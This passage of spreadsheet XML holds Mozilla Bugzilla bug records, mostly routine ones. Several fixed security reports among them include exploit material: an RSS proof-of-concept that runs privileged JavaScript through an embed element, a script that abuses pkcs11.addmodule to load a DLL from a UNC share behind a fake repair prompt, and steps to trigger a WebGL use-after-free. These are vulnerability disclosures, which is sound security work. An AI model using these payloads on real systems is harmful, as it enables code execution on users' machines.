        <v>1</v>
      </c>
      <c r="F2475" t="n">
        <v>1</v>
      </c>
      <c r="G2475" t="n">
        <v>3</v>
      </c>
      <c r="H2475" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2475" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2475" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2475" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2475" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2475" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2475" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2475" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2475" t="inlineStr">
        <is>
          <t>Composer feature work</t>
        </is>
      </c>
      <c r="Q2475" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2475" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2475" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T2475" t="n">
        <v>1</v>
      </c>
      <c r="U2475" t="n">
        <v>0</v>
      </c>
      <c r="V2475" t="n">
        <v>10</v>
      </c>
      <c r="W2475" t="inlineStr">
        <is>
          <t>Steps to Reproduce:
1) Open the Editor application
2) Scroll down to the table inside the default document
3) Click on the bottom-right most cell and hit the tab key
4) Notice that the cell seems to increase in width
Actual Results: Cell increases in width.  This might be accepted since our
tables are more WYSIWYG.
Expected Results: 4.x behavior is that a new row is inserted.
Build Date &amp; Platform Bug Found: 1999-07-30-11-M9 and Win95</t>
        </is>
      </c>
      <c r="X2475" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2476">
      <c r="A2476" t="n">
        <v>950000</v>
      </c>
      <c r="B2476" t="inlineStr">
        <is>
          <t>2013-12-13 03:36:08 -0800</t>
        </is>
      </c>
      <c r="C2476" t="inlineStr">
        <is>
          <t>Crash [@ nsUserFontSet::CheckFontLoad]</t>
        </is>
      </c>
      <c r="D2476" t="inlineStr">
        <is>
          <t>2015-02-22 10:10:04 -0800</t>
        </is>
      </c>
      <c r="E2476" t="n">
        <v>1</v>
      </c>
      <c r="F2476" t="n">
        <v>1</v>
      </c>
      <c r="G2476" t="n">
        <v>3</v>
      </c>
      <c r="H2476" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2476" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2476" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2476" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2476" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2476" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2476" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2476" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2476" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q2476" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2476" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2476" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2476" t="n">
        <v>1</v>
      </c>
      <c r="U2476" t="n">
        <v>0</v>
      </c>
      <c r="V2476" t="n">
        <v>13</v>
      </c>
      <c r="W2476" t="inlineStr">
        <is>
          <t>Created attachment 8347177
testcase
With:
  user_pref("security.fileuri.strict_origin_policy", false);
About half the time, the testcase crashes [@ nsUserFontSet::CheckFontLoad].</t>
        </is>
      </c>
      <c r="X2476" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2477">
      <c r="A2477" t="n">
        <v>723213</v>
      </c>
      <c r="B2477" t="inlineStr">
        <is>
          <t>2012-02-01 11:13:25 -0800</t>
        </is>
      </c>
      <c r="C2477" t="inlineStr">
        <is>
          <t>Throttle updates to 10.0 to 0%</t>
        </is>
      </c>
      <c r="D2477" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2477" t="n">
        <v>1</v>
      </c>
      <c r="F2477" t="n">
        <v>1</v>
      </c>
      <c r="G2477" t="n">
        <v>5</v>
      </c>
      <c r="H2477" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2477" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2477" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2477" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2477" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2477" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2477" t="inlineStr"/>
      <c r="Q2477" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2477" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2477" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2477" t="n">
        <v>1</v>
      </c>
      <c r="U2477" t="n">
        <v>0</v>
      </c>
      <c r="V2477" t="n">
        <v>2</v>
      </c>
      <c r="W2477" t="inlineStr">
        <is>
          <t>Created attachment 593529
stop all the things!</t>
        </is>
      </c>
      <c r="X2477" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2478">
      <c r="A2478" t="n">
        <v>1789371</v>
      </c>
      <c r="B2478" t="inlineStr">
        <is>
          <t>2022-09-06 02:04:48 -0700</t>
        </is>
      </c>
      <c r="C2478" t="inlineStr">
        <is>
          <t>SEGV on unknown address 0xe5e5e5f5 in mozilla::ClientWebGLContext::GetExtension</t>
        </is>
      </c>
      <c r="D2478" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:13 -0700</t>
        </is>
      </c>
      <c r="E2478" t="n">
        <v>1</v>
      </c>
      <c r="F2478" t="n">
        <v>1</v>
      </c>
      <c r="G2478" t="n">
        <v>3</v>
      </c>
      <c r="H2478" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2478" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2478" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2478" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2478" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2478" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2478" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2478" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2478" t="inlineStr">
        <is>
          <t>[fixed by bug 1789371][reporter-external] [client-bounty-form] [verif?][adv-esr102.6+]</t>
        </is>
      </c>
      <c r="Q2478" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2478" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2478" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T2478" t="n">
        <v>1</v>
      </c>
      <c r="U2478" t="n">
        <v>0</v>
      </c>
      <c r="V2478" t="n">
        <v>17</v>
      </c>
      <c r="W2478" t="inlineStr">
        <is>
          <t>Created attachment 9293252
crash.html
I found in Firefox 32-bit after filling with a lot of memory (approximate 3000MB) then create a lot new Worker construction afterward call webgl `getExtension('OES_vertex_array_object')` repeatedly Firefox able to crash on 0xe5e5e5f5 address in mozilla::ClientWebGLContext::GetExtension.
I observe on stdout before Firefox crash it show `WARNING: Call to mmap failed: Operation not permitted` and `Failed to allocate internal command buffer.`. It's look like after Firefox freed the memory, but it fail to allocate new memory on the target address due to low address spaces, so when `getExtension('OES_vertex_array_object')` is called it still point to freed memory which leads to UAF.
## Reproducible on:
- Firefox Nightly 106.0a1 (2022-09-05) (32-bit) on Arch Linux using AMD Ryzen 7 5700G
- Firefox Nightly 106.0a1 (2022-09-05) (32-bit) on Arch Linux using Intel i5-1035G1
- Firefox 104.0.1 (32-bit) on Arch Linux using AMD Ryzen 7 5700G
- Firefox 104.0.1 (32-bit) on Arch Linux using Intel i5-1035G1
## Steps to reproduce:
1. Open Firefox 32-bit
2. Visit attached crash.html
3. Firefox crashed in `mozilla::ClientWebGLContext::GetExtension` on address `0xe5e5e5f5`</t>
        </is>
      </c>
      <c r="X2478" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2479">
      <c r="A2479" t="n">
        <v>1247424</v>
      </c>
      <c r="B2479" t="inlineStr">
        <is>
          <t>2016-02-10 13:46:24 -0800</t>
        </is>
      </c>
      <c r="C2479" t="inlineStr">
        <is>
          <t>Import l10n changes from m-c and get git-export working again</t>
        </is>
      </c>
      <c r="D2479" t="inlineStr">
        <is>
          <t>2016-02-12 04:08:03 -0800</t>
        </is>
      </c>
      <c r="E2479" t="n">
        <v>1</v>
      </c>
      <c r="F2479" t="n">
        <v>1</v>
      </c>
      <c r="G2479" t="n">
        <v>6</v>
      </c>
      <c r="H2479" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2479" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J2479" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K2479" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2479" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2479" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2479" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2479" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2479" t="inlineStr">
        <is>
          <t>[btpp-fix-now]</t>
        </is>
      </c>
      <c r="Q2479" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2479" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2479" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2479" t="n">
        <v>1</v>
      </c>
      <c r="U2479" t="n">
        <v>0</v>
      </c>
      <c r="V2479" t="n">
        <v>5</v>
      </c>
      <c r="W2479" t="inlineStr">
        <is>
          <t>We've landed bug 1239828/bug 1246592 in mozilla-central, but we need to backport those changes and get them working with our build system and exportable again.</t>
        </is>
      </c>
      <c r="X2479" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2480">
      <c r="A2480" t="n">
        <v>750096</v>
      </c>
      <c r="B2480" t="inlineStr">
        <is>
          <t>2012-04-29 10:08:57 -0700</t>
        </is>
      </c>
      <c r="C2480" t="inlineStr">
        <is>
          <t>JavaScript execution via special HTML in RSS view; XSS when pasting malicious content into contenteditable</t>
        </is>
      </c>
      <c r="D2480" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:47 -0700</t>
        </is>
      </c>
      <c r="E2480" t="n">
        <v>1</v>
      </c>
      <c r="F2480" t="n">
        <v>1</v>
      </c>
      <c r="G2480" t="n">
        <v>3</v>
      </c>
      <c r="H2480" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2480" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2480" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2480" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L2480" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2480" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2480" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2480" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2480" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2480" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2480" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2480" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T2480" t="n">
        <v>1</v>
      </c>
      <c r="U2480" t="n">
        <v>0</v>
      </c>
      <c r="V2480" t="n">
        <v>54</v>
      </c>
      <c r="W2480" t="inlineStr">
        <is>
          <t>Created attachment 619421
test.rss
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120423123513
Steps to reproduce:
It is possible to execute JavaScript on the Feed-View - indicating that there might be a security issue leading to RCE. The bug was found as a side-effect while crafting a RSS version of the H5SC.
A PoC file is attached - please see below. The relevant part in the PoC file is this small snippet:
&lt;description&gt;&lt;![CDATA[&lt;embed
src="javascript:top.SubscribeHandler.uninit=function(){alert('hello
chrome://')}"&gt;]]&gt;&lt;/description&gt;
Firefox doesn't seem to filter &lt;embed&gt; elements inside the RSS &lt;description&gt; properly - so we can exec JavaScript. This allows us to hook into the pre-existing script tags. Note the alert in the PoC file is not a "classic website alert" but indicates privileged script exec. 
The bug was found on Ubuntu 11.10:
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
I also tested in Win7 with Nightly (15.0.a1 - today's build) - same effect, JavaScript execution in Feed-View.</t>
        </is>
      </c>
      <c r="X2480" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2481">
      <c r="A2481" t="n">
        <v>984377</v>
      </c>
      <c r="B2481" t="inlineStr">
        <is>
          <t>2014-03-17 07:36:12 -0700</t>
        </is>
      </c>
      <c r="C2481" t="inlineStr">
        <is>
          <t>Streamline "get involved" pages layout and workflow</t>
        </is>
      </c>
      <c r="D2481" t="inlineStr">
        <is>
          <t>2014-04-08 17:58:07 -0700</t>
        </is>
      </c>
      <c r="E2481" t="n">
        <v>1</v>
      </c>
      <c r="F2481" t="n">
        <v>1</v>
      </c>
      <c r="G2481" t="n">
        <v>5</v>
      </c>
      <c r="H2481" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2481" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2481" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2481" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2481" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2481" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2481" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2481" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2481" t="inlineStr">
        <is>
          <t>u=contributor c=wiki p=1 s=2014.7</t>
        </is>
      </c>
      <c r="Q2481" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2481" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2481" t="inlineStr">
        <is>
          <t>2014Q2</t>
        </is>
      </c>
      <c r="T2481" t="n">
        <v>1</v>
      </c>
      <c r="U2481" t="n">
        <v>0</v>
      </c>
      <c r="V2481" t="n">
        <v>10</v>
      </c>
      <c r="W2481" t="inlineStr">
        <is>
          <t>Based on the notes in https://sumo.etherpad.mozilla.org/354:
* Provide exit for people who want to get help rather than provide help (add way to ask a question)
* Move the block of sub-items up and make the click target area bigger
* Remove sign-up from first step and put it on the sub-pages.
Bram, can you provide the visuals for this?</t>
        </is>
      </c>
      <c r="X2481" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2482">
      <c r="A2482" t="n">
        <v>1349564</v>
      </c>
      <c r="B2482" t="inlineStr">
        <is>
          <t>2017-03-22 07:22:12 -0700</t>
        </is>
      </c>
      <c r="C2482" t="inlineStr">
        <is>
          <t>Track "bad states" which user might encounter</t>
        </is>
      </c>
      <c r="D2482" t="inlineStr">
        <is>
          <t>2017-04-06 07:23:03 -0700</t>
        </is>
      </c>
      <c r="E2482" t="n">
        <v>1</v>
      </c>
      <c r="F2482" t="n">
        <v>1</v>
      </c>
      <c r="G2482" t="n">
        <v>2</v>
      </c>
      <c r="H2482" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2482" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2482" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2482" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2482" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2482" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2482" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2482" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2482" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q2482" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2482" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2482" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2482" t="n">
        <v>1</v>
      </c>
      <c r="U2482" t="n">
        <v>0</v>
      </c>
      <c r="V2482" t="n">
        <v>3</v>
      </c>
      <c r="W2482" t="inlineStr">
        <is>
          <t>(From Grisha on the Android Bug)
Tracking problems around metadata (no "X" field which we need in the ui) certainly seems useful. Perhaps tracking cases when we have to generate missing favicons could be good as well for general awareness of what the UI looks like for most users.
For bad states around highlights, this might tie in with work on the highlights algorithm in Bug 1312016.
Background from an email thread:
A-S on Desktop:
Bad States: we try to keep track of bad states such as when we show a highlight without an image, when we show the loading screen for too long or when our addon causes a "may be making your browser slow" warning. These types of bad states are probably different in Android but worth considering if there are any you'd like to collect.
----
A list of the bad states that desktop supports is here
https://github.com/mozilla/activity-stream/blob/master/docs/data_events.md#bad-app-state-pings
For iOS, the show/hide loader events probably don't make sense but knowing when we don't have a metadata image or favicon would be good bad states to track.</t>
        </is>
      </c>
      <c r="X2482" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2483">
      <c r="A2483" t="n">
        <v>509413</v>
      </c>
      <c r="B2483" t="inlineStr">
        <is>
          <t>2009-08-10 08:33:11 -0700</t>
        </is>
      </c>
      <c r="C2483" t="inlineStr">
        <is>
          <t>Remote PKCS11 module installation from UNC path</t>
        </is>
      </c>
      <c r="D2483" t="inlineStr">
        <is>
          <t>2009-09-12 14:00:15 -0700</t>
        </is>
      </c>
      <c r="E2483" t="n">
        <v>1</v>
      </c>
      <c r="F2483" t="n">
        <v>1</v>
      </c>
      <c r="G2483" t="n">
        <v>3</v>
      </c>
      <c r="H2483" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2483" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2483" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K2483" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L2483" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2483" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2483" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2483" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2483" t="inlineStr">
        <is>
          <t>[sg:critical][fix in 326628] requires user accepting a prompt... seemingly a dup of bug 326628</t>
        </is>
      </c>
      <c r="Q2483" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2483" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2483" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2483" t="n">
        <v>1</v>
      </c>
      <c r="U2483" t="n">
        <v>0</v>
      </c>
      <c r="V2483" t="n">
        <v>9</v>
      </c>
      <c r="W2483" t="inlineStr">
        <is>
          <t>Created attachment 393517
Module runs calc.exe when loaded
Dan Kaminsky reported this issue.  His full email to security@m.o:
You have a Javascript function that takes a DLL or a .so file as an argument in all builds of Firefox below 3.5?
Really?
Apparently this has garnered some internal attention over the last three years -- saw https://bugzilla.mozilla.org/show_bug.cgi?id=326628 .
You guys sort of found that this can be thrown into a while(1) loop, but didn't realize it's a fully modal dialog and so all of Firefox is locked until the user hits OK.
What was really missed, however, was the fact that on Windows a UNC path can be used as an argument to LoadLibrary.  So the DLL can be loaded from a remote source.
Exploit looks like this:
&lt;body&gt;
&lt;script&gt;
  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
            "Please click 'OK' to repair."
  ret=-2;
  while(ret!=-5){
     ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\127.0.0.1\\c$\\pkunkcs", 0, 0);
  }
&lt;/script&gt;
pkunkcs attached, launches calc.exe.  Obviously the path doesn't need to loop back to 127.0.0.1 .</t>
        </is>
      </c>
      <c r="X2483" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2484">
      <c r="A2484" t="n">
        <v>1243583</v>
      </c>
      <c r="B2484" t="inlineStr">
        <is>
          <t>2016-01-27 16:10:11 -0800</t>
        </is>
      </c>
      <c r="C2484" t="inlineStr">
        <is>
          <t>Assertion failure: IsIdle(oldState), at xpcom/glue/PLDHashTable.h:140</t>
        </is>
      </c>
      <c r="D2484" t="inlineStr">
        <is>
          <t>2019-06-24 05:07:28 -0700</t>
        </is>
      </c>
      <c r="E2484" t="n">
        <v>1</v>
      </c>
      <c r="F2484" t="n">
        <v>1</v>
      </c>
      <c r="G2484" t="n">
        <v>3</v>
      </c>
      <c r="H2484" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2484" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2484" t="inlineStr">
        <is>
          <t>DOM: Animation</t>
        </is>
      </c>
      <c r="K2484" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2484" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2484" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2484" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2484" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2484" t="inlineStr">
        <is>
          <t>[adv-main45+]</t>
        </is>
      </c>
      <c r="Q2484" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2484" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2484" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2484" t="n">
        <v>1</v>
      </c>
      <c r="U2484" t="n">
        <v>0</v>
      </c>
      <c r="V2484" t="n">
        <v>31</v>
      </c>
      <c r="W2484" t="inlineStr">
        <is>
          <t>Created attachment 8712947
backtrace of assertion failure
STR:
 1. Load attached testcase (coming up) in a debug build.
(The testcase has an iframe that has an event handler which removes the iframe from its parent document.)
ACTUAL RESULTS:
Assertion failure: IsIdle(oldState), at /scratch/work/builds/mozilla-central/mozilla-central-11-11-01.13-56/mozilla/xpcom/glue/PLDHashTable.h:140
The backtrace (attached) shows this is happening in EventListener::HandleEvent calling into JS, unsurprisingly.
Marking this as security-sensitive because:
 (1) even though we're not crashing, this seems like we might be on the edge of using freed memory.
 (2) I hit this when trying to come up with a testcase for bug 1243555 (and this might be close to something usable as an attack-vector for that bug), so we probably shouldn't open this up until bug 1243555 is no longer a threat.</t>
        </is>
      </c>
      <c r="X2484" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2485">
      <c r="A2485" t="n">
        <v>1200085</v>
      </c>
      <c r="B2485" t="inlineStr">
        <is>
          <t>2015-08-30 19:31:23 -0700</t>
        </is>
      </c>
      <c r="C2485" t="inlineStr">
        <is>
          <t>Firefox 40.0.2 Crash [@ libgmpopenh264.dylib@0x25c1 ]</t>
        </is>
      </c>
      <c r="D2485" t="inlineStr">
        <is>
          <t>2016-05-26 09:49:19 -0700</t>
        </is>
      </c>
      <c r="E2485" t="n">
        <v>1</v>
      </c>
      <c r="F2485" t="n">
        <v>1</v>
      </c>
      <c r="G2485" t="n">
        <v>3</v>
      </c>
      <c r="H2485" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2485" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2485" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K2485" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L2485" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2485" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2485" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2485" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2485" t="inlineStr"/>
      <c r="Q2485" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2485" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2485" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2485" t="n">
        <v>1</v>
      </c>
      <c r="U2485" t="n">
        <v>0</v>
      </c>
      <c r="V2485" t="n">
        <v>10</v>
      </c>
      <c r="W2485" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3
Steps to reproduce:
This crash happened after start,stop video several times
crash link: https://crash-stats.mozilla.com/report/index/f4648e5e-a469-499c-a3f3-8186b2150826</t>
        </is>
      </c>
      <c r="X2485" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2486">
      <c r="A2486" t="n">
        <v>8971</v>
      </c>
      <c r="B2486" t="inlineStr">
        <is>
          <t>1999-06-28 15:37:48 -0700</t>
        </is>
      </c>
      <c r="C2486" t="inlineStr">
        <is>
          <t>Thread spawned by XPInstall causes crash on startup</t>
        </is>
      </c>
      <c r="D2486" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E2486" t="n">
        <v>1</v>
      </c>
      <c r="F2486" t="n">
        <v>1</v>
      </c>
      <c r="G2486" t="n">
        <v>6</v>
      </c>
      <c r="H2486" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2486" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2486" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K2486" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2486" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2486" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2486" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2486" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2486" t="inlineStr"/>
      <c r="Q2486" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2486" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2486" t="inlineStr">
        <is>
          <t>M8</t>
        </is>
      </c>
      <c r="T2486" t="n">
        <v>1</v>
      </c>
      <c r="U2486" t="n">
        <v>0</v>
      </c>
      <c r="V2486" t="n">
        <v>5</v>
      </c>
      <c r="W2486" t="inlineStr">
        <is>
          <t>Currently, XPInstall spawns a thread at startup to perform scheduled tasks
including file deletions/replacements from previously conducted installs. This
causes a crash because
"...of a race condition in the dynamic loader. Two threads are
trying to relocate code at the same time and this royally hoses stuff. Thread #1
is running the component manager. Evil Thread #2 comes from normal static
linkage from xpinstall." [waterson, bug #8849]
As a result XPInstall has been turned of on Unix again.</t>
        </is>
      </c>
      <c r="X2486" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2487">
      <c r="A2487" t="n">
        <v>442786</v>
      </c>
      <c r="B2487" t="inlineStr">
        <is>
          <t>2008-06-30 15:39:51 -0700</t>
        </is>
      </c>
      <c r="C2487" t="inlineStr">
        <is>
          <t>Make verbatim prettier</t>
        </is>
      </c>
      <c r="D2487" t="inlineStr">
        <is>
          <t>2016-02-12 08:06:01 -0800</t>
        </is>
      </c>
      <c r="E2487" t="n">
        <v>1</v>
      </c>
      <c r="F2487" t="n">
        <v>1</v>
      </c>
      <c r="G2487" t="n">
        <v>6</v>
      </c>
